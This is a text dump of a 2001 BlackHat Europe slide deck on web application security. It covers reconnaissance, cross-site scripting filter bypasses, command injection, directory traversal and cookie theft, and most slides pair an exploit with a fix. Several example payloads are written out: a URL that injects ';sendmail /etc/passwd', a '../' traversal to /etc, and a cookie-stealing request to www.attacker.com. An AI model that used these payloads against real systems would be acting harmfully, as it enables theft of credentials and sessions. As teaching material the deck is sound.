1.Web Application Security"The Land that Information Security Forgot."BlackHat Europe 2001 Jeremiah Grossman jeremiah@whitehatsec.com WhiteHat Security www.whitehatsec.com 2001(c)WhiteHat Security, Inc.

2. Topics Web Application Security LandscapeCommon Web Application Security MistakesWeb Application Attack Methodologies Information & DiscoveryInput Manipulation/Parameter Tampering Authentication/Authorization System Mis-Configurations 3. What is a Web Application?A web application or web service is asoftware application that is accessibleusing a web browser or HTTP(s) useragent.2001(c)WhiteHat Security, Inc. 4. LAYERS2001(c)WhiteHat Security, Inc. 5. What isWeb Application Security?Simply, Web Application Security is... The securing of web applications.2001(c)WhiteHat Security, Inc. 6. FIREWALL2001(c)WhiteHat Security, Inc. 7. SSL2001(c)WhiteHat Security, Inc. 8. Common Web Application Security Mistakes 2001(c)WhiteHat Security, Inc. 9. Trusting Client-Side Data DO NOT TRUST CLIENT-SIDE DATA!Identify all input parameters thattrust client-side data. 2001(c)WhiteHat Security, Inc. 10. Unescaped Special Characters ! @ $ % ^ & * ( ) -_ + ` ~| [ ] { } ; :" ? / , . > => >< =>&Null characters should all be removed. %002001(c)WhiteHat Security, Inc. 12. More mistakesAuthentication mechanisms using technologies suchas JavaScript or ActiveX.Lack of re-authenticating the user before issuing newpasswords or performing critical tasks.Hosting of uncontrolled data on a protected domain.2001(c)WhiteHat Security, Inc. 13. Information & DiscoverySpidering/Site CrawlingIdentifiable CharacteristicsErrors and Response CodesFile/Application EnumerationNetwork Reconnaissance 2001(c)WhiteHat Security, Inc. 14. Spidering/Site CrawlingSite Map Hidden ServicesService Map CGIs and FormsDocumentation Email addresses Tools: WGEThttp://www.gnu.org/software/wget/wget.html2001(c)WhiteHat Security, Inc. 15. Identifiable CharacteristicsComment LinesURL ExtensionsMeta TagsCookiesClient-Side scripting languages2001(c)WhiteHat Security, Inc. 16. Error and Response Codes HTTP Response Headers Error Messages2001(c)WhiteHat Security, Inc. 17. File/ApplicationEnumerationCommonly referred to as forced browsing or CGIScanning.Directory BrowsingIndex Listings Tools: Whiskerhttp://www.wiretrip.net/rfp/p/doc.asp/i2/d21.htm 2001(c)WhiteHat Security, Inc. 18. Network ReconnaissanceWHOISARIN http://www.arin.net/whois/index.htmlPort Scan Nmap http://www.insecure.org/nmap/index.htmlTraceroutePing Scan (Nmap or HPING) http://www.hping.org/NSLookup/ Reverse DNSDNS Zone Transfer (DIG)2001(c)WhiteHat Security, Inc. 19. Input ManipulationParameter Tampering"Twiddling Bits."Cross-Site ScriptingFilter-Bypass ManipulationOS CommandsMeta CharactersPath/Directory TraversalHidden Form Field ManipulationHTTP Headers 2001(c)WhiteHat Security, Inc. 20. Cross-Site ScriptingBad name given to a dangerous security issueAttack targets the user of the system ratherthan the system itself.Outside client-side languages executing withinthe users web environment with the same levelof privilege as the hosted site.2001(c)WhiteHat Security, Inc. 21. Client-Side ScriptingLanguagesDHTML (HTML, XHTML, HTML x.0)JavaScript (1.x)Java (Applets)VBScriptFlashActiveXXML/XSLCSS 2001(c)WhiteHat Security, Inc. 22. Accessing the DOM&Outside the DOMDocument Object Model (DOM)Client-Side languages possess an enormous amount ofpower to access and manipulate the DOM within abrowser.Complex & diverse interconnections create an increasedthe level of access within the DOM.Increased level of access to read & modify DOM dataranging anything from background colors, to a file onyour systems, and beyond to executing systems calls. 2001(c)WhiteHat Security, Inc. 23. CSS Danger The Remote Launch Pad.Successfully CSS a user via a protected domain.Utilizing a Client-Side utility (JavaScript, ActiveX,VBScript, etc.), exploit a browser hole todownloada trojan/virus.User is unknowingly infected/compromised withina single HTTP page load. 24. Dangerous HTMLits all bad.Solution: replace all "script" tags. 2001(c)WhiteHat Security, Inc. 28. SRCing JavaScript ProtocolDescription: The JavaScript protocol will execute theexpression entered after the colon. Netscape Tested.Exploit: Solution: Replace "javascript" strings in all SRC & HREFattributes in HTML tags with another string.Exp: will render this script useless.Further Information:Any HTML tag with a SRC attribute will execute this script onpage load or on link activation.As a further protocol pattern matching, keywords "livescript"and "mocha" must be also replaced for the hold the samepossibilities.*** Netscape code names *** 2001(c)WhiteHat Security, Inc. 29. SRCing JavaScript Protocol w/HTML EntitiesDescription: As another derivative of the previous, DecimalHTML entities within these strings can cause filter bypass.Exploit:Replacement of entities 10 - 11 - 12 - 13 will also succeed.Hex instead of Decimal HTML entities will also bypass inputfilters and execute.As well as placing multiple ZEROs in front.Solution:Filter these entities within the string then do your further patternmatching 2001(c)WhiteHat Security, Inc. 30. AND CURLYDescription:Obscure Netscape JavaScript execution line. Exact syntax isneeded to execute.Exploit:Solution:or something similar will nullify the problem. 2001(c)WhiteHat Security, Inc. 31. Style Tag ConversionDescription: Turn a style tag into a JavaScript expression.Exploit:Solution: Replace the "javascript" string with "java_script" and all should be fine.Exploit: Import dangerous CSS.Solution: Filter and replace the "@importExploit: Import a JavaScript Expression through a style tag.Solution: Again, filter and replace the "@import" and the "javascript:" justto be safe.2001(c)WhiteHat Security, Inc. 32. Twiddling BitsOS CommandsMeta CharactersPath/Directory Traversal2001(c)WhiteHat Security, Inc. 33. Power of the Semi-Colon piping input to the command line.OS CommandsNormal:http://foo.com/app.cgi?email=none@foo.comAltered:http://foo.com/app.cgi?email=none@foo.com;+sendmail+/etc/passwdShell pipes and re-directs can also be used. 34. Power of the Semi-Colon piping input to the command line.Meta CharactersNormal:http://foo.com/app.cgi?list=file.txtAltered:http://foo.com/app.cgi?list=* 35. Power of the Semi-Colon piping input to the command line.Path Directory TraversalNormal:http://foo.com/app.cgi?directory=/path/to/dataAltered:http://foo.com/app.cgi?directory=path/to/data../../../../../../etc 36. More bitsHidden Form Field ManipulationHTTP Headers 2001(c)WhiteHat Security, Inc. 37. Authentication/Authorization Hand in the cookie jar.Cookies are restricted to domains (.acme.com)Uncontrolled data on a restricted domain can accessthe cookie data.JavaScript Expression: "document.cookie"window.opendocument.img.srcHidden Form Submitwww.attacker.com/cgi-bin/cookie_thieft.pl?COOKIEDATACookie data is passed to a CGI through a GET request to a offdomain host. 2001(c)WhiteHat Security, Inc. 38. System Mis-Configurationspatches, patches, and morepatches" Vendor Patches Default AccountsCheck:Web Server permission by directory browsingSoftware version from DiscoveryKnown default accounts in commercial platformsBugTraqAnonymous FTP open on Web Server2001(c)WhiteHat Security, Inc. 39. Introducing OWASP Open Web ApplicationSecurity Project http://www.owasp.orgThe "Open Web Application Security Project" or OWASPis a community effort focused on definingRecommendations, Specifications and Methodologiesfor Designing, Developing, Deploying and Testing thesecurity of web enabled applications or web services.The "Open Web Application Security Project" or OWASPis based on an idea from the participants of the www-mobile-code mailing list at securityfocus.comYou can join the mailing list by visitingwww.securityfocus.com. 2001(c)WhiteHat Security, Inc. 40. Thank You. Questions?Jeremiah GrossmanJeremiah@whitehatsec.com WhiteHat Securitywww.whitehatsec.com